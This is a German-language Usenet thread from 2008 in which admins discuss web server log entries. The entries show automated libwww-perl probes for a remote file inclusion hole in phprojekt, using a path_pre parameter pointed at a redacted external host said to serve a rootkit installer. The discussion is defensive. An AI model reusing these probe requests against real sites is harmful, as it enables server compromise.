Hallo Leute,

ich habe heute mal wieder in meinen Logs gestöbert. und dabei sind mir
verschieden Einträge in der Art:

dnh24.de - - [26/Jan/2008:03:31:45 +0100] "GET /phprojekt/lib/
gpcs_vars.inc.php?path_pre=3D[evil_root]? HTTP/1.1" 404 54 "-" "libwww-
perl/5.65"
dnh24.de - - [26/Jan/2008:03:31:45 +0100] "GET /index.php HTTP/1.1"
302 296 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:31:45 +0100] "GET /index.php HTTP/1.1"
302 301 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:31:45 +0100] "GET /index.php HTTP/1.1"
200 4308 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /gpl/phpcms/phprojekt/
lib/gpcs_vars.inc.php?path_pre=3D[evil_root]? HTTP/1.1" 404 54 "-"
"libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /index.php HTTP/1.1"
302 296 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /index.php HTTP/1.1"
302 301 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /index.php HTTP/1.1"
200 4308 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /phprojekt/lib/
gpcs_vars.inc.php?path_pre=3D[evil_root]? HTTP/1.1" 404 54 "-" "libwww-
perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /index.php HTTP/1.1"
302 296 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /index.php HTTP/1.1"
302 301 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /index.php HTTP/1.1"
200 4308 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /gpl/phprojekt/lib/
gpcs_vars.inc.php?path_pre=3D[evil_root]? HTTP/1.1" 404 54 "-" "libwww-
perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /index.php HTTP/1.1"
302 296 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /index.php HTTP/1.1"
302 301 "-" "libwww-perl/5.65"
dnh24.de - - [26/Jan/2008:03:35:10 +0100] "GET /index.php HTTP/1.1"
200 4308 "-" "libwww-perl/5.65"


aufgefallen:

wenn ich [evil_root] mit curl aufrufe bekomme ich eine PHP Datei was
sich für mir wie ein rootkit installer Tool liest.

Die externen Dateien werden zumeist als gif, jpg oder txt getarnt auf
verschiedenen Domains abgelegt.

Der Angriff scheint scheinbar auf phprojekt Installationen.

http://www.google.com/codesearch?as_q=3Dpath_pre&btnG=3DSear ch+Code&hl=3Den&=
as_lang=3Dphp&as_license_restrict=3Di&as_license=3D&as_packa ge=3D&as_filenam=
e=3D&as_case=3D

http://www.google.de/search?q=3Dlibwww-perl+path_pre&ie=3DUT F-8&oe=3Dutf-8

mfg

Marcus

Am Wed, 30 Jan 2008 03:50:49 -0800 schrieb
obwandner [at] googlemail.com:

^-

> ich habe heute mal wieder in meinen Logs gestöbert. und dabei sind mir
> verschieden Einträge in der Art:
>
> dnh24.de - - [26/Jan/2008:03:31:45 +0100] "GET /phprojekt/lib/
> gpcs_vars.inc.php?path_pre=[evil_root]? HTTP/1.1" 404 54 "-" "libwww-
> perl/5.65"

Du kannst libwww aussperren
http://www.google.com/search?q=libwww+aussperren

> Der Angriff scheint scheinbar auf phprojekt Installationen.

ja auch


r23
--
http://www.oos-shop.de/

On 30 Jan., 13:42, Ralf Zschemisch <i... [at] r23.de> wrote:
> ^-
>
> ...
>
> Du kannst libwww aussperrenhttp://www.google.com/search?q=libwww+aussperren
Der Trick ist bekannt, aber nur bedingt hilfreich, da ich einige
Dienste habe die geneau das machen sollen, mit libwww auf meine
Systeme zuzugreifen...

zum anderen ich habe zwar Attacken, aber keinen Einbruch... mein
System ist (und bleibt hoffentlich) sauber.

Meine auf meine phprojekt Installation, kann nur mit einem bestimmten
Zertifikat zugegriffen werden, alle anderen bekommen einen 403 zu
sehen.

>
> > Der Angriff scheint scheinbar auf phprojekt Installationen.
>
> ja auch
Welche Installationen denn noch???


>
> r23
> --http://www.oos-shop.de/

mfg
Marcus

Ralf Zschemisch schrieb:
>> ich habe heute mal wieder in meinen Logs gestöbert. und dabei sind mir
>> verschieden Einträge in der Art:
>>
>> dnh24.de - - [26/Jan/2008:03:31:45 +0100] "GET /phprojekt/lib/
>> gpcs_vars.inc.php?path_pre=[evil_root]? HTTP/1.1" 404 54 "-" "libwww-
>> perl/5.65"
>
> Du kannst libwww aussperren
> http://www.google.com/search?q=libwww+aussperren

Naja, ist ja nicht so dass Perl das Patent darauf hat, zu Angriffen
benutzt zu werden. Davon abgesehen ist es vermutlich ziemlich einfach,
den BrowserAgent zu ändern. ;)

Michael

Ralf Zschemisch <info [at] r23.de> wrote:
> Am Wed, 30 Jan 2008 03:50:49 -0800 schrieb
> obwandner [at] googlemail.com:
>
> ^-
>
>> ich habe heute mal wieder in meinen Logs gestöbert. und dabei sind mir
>> verschieden Einträge in der Art:
>>
>> dnh24.de - - [26/Jan/2008:03:31:45 +0100] "GET /phprojekt/lib/
>> gpcs_vars.inc.php?path_pre=[evil_root]? HTTP/1.1" 404 54 "-" "libwww-
>> perl/5.65"
>
> Du kannst libwww aussperren
> http://www.google.com/search?q=libwww+aussperren

Ha, ha.

obwandner [at] googlemail.com <obwandner [at] googlemail.com> wrote:

> ich habe heute mal wieder in meinen Logs gestöbert. und dabei sind mir
> verschieden Einträge in der Art:

Das Thema ist ja schon fast FAQ-reif ...

<news:ARIVpY3zSsB [at] helmut.hullen.de> ff.
<news:5ukqtgF1intt0U1 [at] mid.uni-berlin.de> ff.

bye, Dirk


--
http://spam.tinyweb.net/article.php/stupid-script-kiddies